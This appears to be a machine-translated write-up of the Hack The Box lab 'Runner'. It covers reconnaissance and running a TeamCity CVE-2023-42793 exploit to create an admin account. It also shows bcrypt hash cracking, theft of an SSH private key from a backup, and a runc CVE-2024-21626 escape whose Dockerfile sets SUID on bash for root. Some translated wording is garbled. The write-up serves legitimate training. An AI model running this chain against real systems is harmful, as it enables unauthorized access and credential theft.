Location>code7788 >text

HTB-Runner target machine notes

Popularity:223 ℃/2024-09-02 16:03:43

HTB-Runner target machine notes

summarize

Runner is a moderately difficult Linux target machine on HTB that contains the followingteamcityVulnerability (CVE-2023-42793) This vulnerability allows users to bypass authentication and extract API tokens. As well as docker containers escaping CVE-2024-21626 to perform power lifting operations

Runner target machine address:/machines/Runner

I. nmap scanning

1) Port scanning
nmap -sT --min-rate 10000 -p- -o ports 10.10.11.13
Warning: 10.10.11.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.13
Host is up (0.26s latency).
Not shown: 63375 closed tcp ports (conn-refused), 2157 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

# Nmap done at Fri Aug 30 22:29:18 2024 -- 1 IP address (1 host up) scanned in 47.39 seconds
2) Detailed information scanning
nmap -sT -sV -sC -O -p22,80,8000 -o detail 10.10.11.13
Starting Nmap 7.93 (  ) at 2024-09-01 20:51 EDT
Nmap scan report for 10.10.11.13
Host is up (0.11s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to /
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds

see thathttp-title: Did not follow redirect to

Let's go to the /etc/hosts file and bind the domain name

sudo vi /etc/hosts

particle marking the following noun as a direct object10.10.11.13 put it in

3) Default Script Scanning

sudo nmap --script=vuln -p22,80,8000 10.10.11.13 -o vuln 

II. Web penetration

image-20240902090140120

Opened the homepage to test and collect a circle of information, and there is no useful, may be used is the name of the homepage line surface

image-20240902090316730

shot,etc. are 404 pages

Try both directory bursting and subdomain bursting.

1) Catalog Blasting

sudo gobuster dir -u  -w /usr/share/wordlists/dirb/  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 178] [--> /assets/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

2) Sub-domain blasting

ffuf -u  -H "HOST:" -w /usr/share/SecLists/Discovery/DNS/ -fs 154
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : 
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/
 :: Header           : Host: 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

[Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 121ms]
    * FUZZ: teamcity
image-20240902090920755

Directory on the left, subdomains on the right

3) Information Analysis

Directory blasts clicked through with no useful information, and we swept up a subdomainwrite/etc/hostsPapers

echo "10.10.11.13  " | tee -a /etc/hosts

interviews

image-20240902091633507

Tested sql injection, reset password, etc., none of them work, google search vulnerability

CVE-2023-42793 :/exploits/51884

He allows us to create an administrator user without authorization, start reading the exp, his internal principle is not difficult to understand. It is unauthorized access, resulting in the administrator's token leakage, the use of this token to create a new administrator account

Paste his code into kali, empty commands to see help

 python                                

=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *   
*                                                   *
*  Author: ByteHunter                               *
=====================================================

usage:  [-h] -u URL [-v]
: error: the following arguments are required: -u/--url
python  -u                               

=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *   
*                                                   *
*  Author: ByteHunter                               *
=====================================================

Token: eyJ0eXAiOiAiVENWMiJ9.Z2Q5NHVFQjFpdnJqLVpvRjVueVNkWTF4WkN3.YTM5MjkwZTktNTU1MS00MzA5LThkYTUtODc2MTQ5M2MwODUx
Successfully exploited!
URL: 
Username: city_adminbsnn
Password: Main_password!!**

He created an administrator user for uscity_adminbsnn:Main_password!!**

Log in.

image-20240902093454029

Go to the backend and download the backup file

image-20240902093613586

Download it locally and unzip it

image-20240902094058407

Go through the directory, the configuration file and the database file usually have information, first change the permissions

sudo chmod -R 777 *

I found it in my search.usershash value of

image-20240902094845130

Take the voucher information and use theawk,sed,teeand other tools to deal with it, and of course copying it to a new file red can be

John:$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/
nspjipzg:$2a$07$NhQTyKKikNjDy4HgKBjiiuc2ftK1XelfKkNiHy.4/HjDG1qmr9w36
city_adminbwgn:$2a$07$lQsvDl0GcSMeUl95ZZWBReYJYqymfIhZf20W3gQpoRw0TFtBy875u

image-20240902095110411

Identify the encryption method with hashid

cat creds | awk -F: '{print $2}'|head -n 1 | hashid
Analyzing '$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board  
[+] bcrypt 

bebcrypt

Find the module number in hashcat

hashcat --help| grep bcrypt
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce

brute force password cracking

hashcat creds /usr/share/wordlists/  --username -m 3200   

Execution completed, view results

hashcat creds /usr/share/wordlists/  --username -m 3200 --show
Matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/:piper123
a) Account Information

Vouchers:Matthew:piper123

Tried ssh and found it wasn't. Had to give up. Go ahead and look in the backup file to see if there's anything else I can find.

b) ssh information

Finally found the ssh key

./config/projects/AllProjects/pluginData/ssh_keys/id_rsa

Let's copy it.

cp ./config/projects/AllProjects/pluginData/ssh_keys/id_rsa ../../id_rsa

Check out who it belongs to

 cat john.id_rsa | grep -v '\-' | base64 -d | strings

Seeing that the plaintext message hasjohn@runner

image-20240902100848517

rename

image-20240902100446657

III. Gaining a foothold

chmod 600 id_rsa
ssh [email protected] -i john.id_rsa -o EnableEscapeCommandline=yes

-o EnableEscapeCommandline=yes is to allow ssh tunneling commands to be executed back to the physical machine when ssh is connected, making it easier to build sockets tunnels, or establish port forwarding

image-20240902101756062

image-20240902102209291

iv. power of attorney

ss -lant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -                   
tcp        0    248 10.10.11.13:22          10.10.14.11:33776       ESTABLISHED -                   
tcp        0      0 127.0.0.1:59056         127.0.0.1:8111          TIME_WAIT   -                   
tcp        0      0 127.0.0.1:41720         127.0.0.1:8111          TIME_WAIT   -                   
tcp        0      0 10.10.11.13:80          10.10.14.11:33912       ESTABLISHED -                   
tcp        0      0 172.17.0.1:54814        172.17.0.2:8111         TIME_WAIT   -                   
tcp        0      0 127.0.0.1:8111          127.0.0.1:59430         TIME_WAIT   -     
tcp        0      0 127.0.0.1:59216         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      1 10.10.11.13:38340       8.8.8.8:53              SYN_SENT    -     
tcp        0      0 172.17.0.1:34338        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 172.17.0.1:40448        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 127.0.0.1:58786         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      0 127.0.0.1:33934         127.0.0.1:8111          TIME_WAIT   -     
tcp        0      0 127.0.0.1:8111          127.0.0.1:55392         TIME_WAIT   -     
tcp        0      0 172.17.0.1:54802        172.17.0.2:8111         TIME_WAIT   -    
tcp        0      0 127.0.0.1:41716         127.0.0.1:8111          TIME_WAIT   -    
tcp        0      0 10.10.11.13:80          10.10.16.3:34523        TIME_WAIT   -    
tcp        0      0 127.0.0.1:8111          127.0.0.1:55406         TIME_WAIT   -     
tcp        0      0 172.17.0.1:54982        172.17.0.2:8111         TIME_WAIT   -     
tcp        0      0 127.0.0.1:59044         127.0.0.1:8111          TIME_WAIT   -    
tcp        0      0 127.0.0.1:8111          127.0.0.1:59436         TIME_WAIT   -  
tcp6       0      0 :::80                   :::*                    LISTEN      -     
tcp6       0      0 :::22                   :::*                    LISTEN      -     
tcp6       0      0 :::8000                 :::*                    LISTEN      -     

See a bunch of local ports open, build a sockets tunnel for ssh, visit the

In an ssh session, press~C Entering an ssh session

image-20240902103756196

Hitting enter twice to exit won't terminate our sockets proxy.

Configure the sockets proxy in kali's local browser127.0.0.1:1080Then you can access the target's resources. I'm using Little Fox here, depending on your personal preference. Build it and you're good to go.

Found that 9000 is a docker admin page.

image-20240902110347454

Login required

Obtained in the secondVouchers:Matthew:piper123Since it's not ssh credentials, try it here

image-20240902111143253

Successful landing

Now that we have docker, let's see what version of runc we have.

runc --version

runc version 1.1.7-0ubuntu1~22.04.1
spec: 1.0.2-dev
 go: go1.18.1
libseccomp: 2.5.3

This one has a container escape vulnerability

CVE-2024-21626:/blog/leaky-vessels-container-escape-vulnerabilities#cve-2024-21626-5

/files/176993/runc-1.1.

Simple to understand:

just likerunc Improper management in handling file descriptors. File descriptor leaks allow newly created container processes to accidentally inherit working directories in the host file system namespace. This leak allowed container processes to access the host filesystem, leading to container escapes.

By learning and understanding this vulnerability, combined with the current state of our target machine, we are not able to create and manipulate a docker image in this target machine, but we can create and manipulate a docker image in theportainerCreate containers and images in the panel

We'll create the folder with john in the target machine.

mkdir -p /tmp/lingx5
cp /bin/bash /tmp/lingx5/bash

Fill in the

FROM ubuntu:latest
  WORKDIR /proc/self/fd/8
	RUN cd ../../../../../../../../ && \
    chmod -R 777 /tmp/lingx5 && \
    chown -R root:root /tmp/lingx5 && \
    chmod u+s /tmp/lingx5/bash

image-20240902152140077

Click on the builimage below

Let's just put/tmp/lingx5/bashThe file is given SUID permissions

image-20240902152022186

Seeing that the compilation was successful, it should have given our/tmp/lingx5/bashSUID privileges are granted

fulfillment

/tmp/lingx5/bash -p

Privilege to root

cat /root/
image-20240902151944661

summarize

  1. We did a port discovery on the host using nmap and found ports 22,80,8000 open.
  2. In the process of penetration of 80, found that the home page of the directory blasting information is very little, the idea of sub-domain blasting, blasting theteamcityThe subdomain found CVE-2023-42793 by searching google for public vulnerabilities and created an admin user. We logged in and found a backup function, we downloaded the backup file locally, and during the rummage we found theCredentials: matthew:piper123and a ssh key for john
  3. After using the key to gain a foothold on john and looking at the services running locally, most of them are ports that only allow local access, we built a sockets tunnel using ssh and visited the page to find the docker service on port 9000.
  4. utilizationCredentials: matthew:piper123Logged into the backend, through the judgment of the runc version, found that there is an escape vulnerability, using the principle of CVE-2024-21626, and some reproduction of the important operation to lift the power.